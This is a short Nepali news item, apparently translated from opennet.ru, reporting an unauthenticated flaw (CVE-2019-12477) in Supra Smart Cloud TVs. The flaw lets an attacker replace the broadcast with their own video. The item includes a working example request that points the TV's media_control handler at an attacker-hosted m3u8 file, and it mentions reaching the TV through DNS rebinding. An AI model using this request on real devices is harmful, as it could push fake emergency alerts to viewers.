सुप्रा स्मार्ट टिभीहरूमा कमजोरी जसले तपाईंलाई काल्पनिक भिडियोहरू प्रदर्शन गर्न अनुमति दिन्छ

सुप्रा स्मार्ट क्लाउड टिभीहरूमा पहिचान गरियो जोखिम (CVE-2019-12477) जसले तपाईंलाई हाल हेरिएको कार्यक्रमलाई आक्रमणकारीको सामग्रीसँग बदल्न अनुमति दिन्छ। उदाहरणको रूपमा, आपतकालीन अवस्थाको बारेमा काल्पनिक चेतावनीको आउटपुट प्रदर्शन गरिएको छ।

आक्रमणको लागि, प्रमाणीकरणको आवश्यकता पर्दैन भनेर विशेष रूपमा निर्मित नेटवर्क अनुरोध पठाउन पर्याप्त छ। विशेष रूपमा, तपाईंले भिडियो प्यारामिटरहरू सहित m3u8 फाइलको URL निर्दिष्ट गरेर "/remote/media_control?action=setUri&uri=" ह्यान्डलर पहुँच गर्न सक्नुहुन्छ, उदाहरणका लागि "http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8।"

धेरै जसो अवस्थामा, टिभीको आईपी ठेगानामा पहुँच आन्तरिक नेटवर्कमा सीमित हुन्छ, तर अनुरोध HTTP मार्फत पठाइएको हुनाले, प्रयोगकर्ताले विशेष रूपमा डिजाइन गरिएको बाह्य पृष्ठ खोल्दा आन्तरिक स्रोतहरू पहुँच गर्न विधिहरू प्रयोग गर्न सम्भव छ (उदाहरणका लागि, अन्तर्गत तस्विर अनुरोधको आड वा प्रयोग गरेर DNS रिबाइन्डिङ).

स्रोत: opennet.ru